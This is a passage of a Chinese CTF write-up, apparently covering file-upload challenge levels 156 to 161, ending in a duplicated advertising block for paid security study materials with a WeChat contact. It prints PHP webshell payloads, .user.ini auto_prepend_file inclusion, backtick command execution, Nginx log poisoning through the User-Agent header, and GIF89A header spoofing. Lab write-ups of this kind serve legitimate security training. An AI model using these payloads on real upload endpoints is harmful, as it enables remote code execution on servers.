3.<% echo ‘123’;%> //前提是开启配置参数 asp_tags=on
4. //不需要修改参数开关
.user.ini:auto_prepend_file=test.png
test.png:<?=eval($\_POST[x]);?>
与上两题结合即可,利用.user.ini,去触发1.png,1.png中还需内容过滤
156 JS 验证+user.ini+短标签+过滤 :同理
.user.ini:auto_prepend_file=test.png
test.png:<?=eval($\_POST{x});?>
157 158 159 JS 验证+user.ini+短标签+过滤
使用反引号运算符的效果与函数 shell_exec()相同
.user.ini:auto_prepend_file=test.png
发现它的过滤是将分号和php过滤
test.png:<?=system('tac ../fl\*')?>
test.png:<?='tac ../fl\*'?> ——反引号
test.png:<? echo `tac /var/www/html/f\*`?>
160 JS 验证+user.ini+短标签+过滤
包含默认日志,日志记录 UA 头,UA 头写后门代码
日志文件:记录访问的地址和访问的信息和访问的UA头,我们将UA头改为payload,UA头流入日志文件中,再利用/user.ini去包含日志文件,去触发UA头中的payload
日志文件是根据中间件去决定:此时分析数据包得知是Nginx
.user.ini:auto_prepend_file=test.png
test.png:<?=include"/var/lo"."g/nginx/access.lo"."g"?>
做了.user.ini文件配置之后,访问upload的情况——包含了日志文件,故显示出日志文件的内容
此时我们只要对其网页进行访问,日志文件就会记录我们的访问信息
通过抓包对参数进行修改得知,上传成功
161 JS 验证+user.ini+短标签+过滤+文件头
文件头部检测是否为图片格式文件
.user.ini:GIF89A auto_prepend_file=test.png
test.png:GIF89A <?=include"/var/lo"."g/nginx/access.lo"."g"?>——做了过滤处理
前端验证文件内容头部信息
.jpg的文件头
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
[外链图片转存中…(img-3dEpolny-1712625701944)]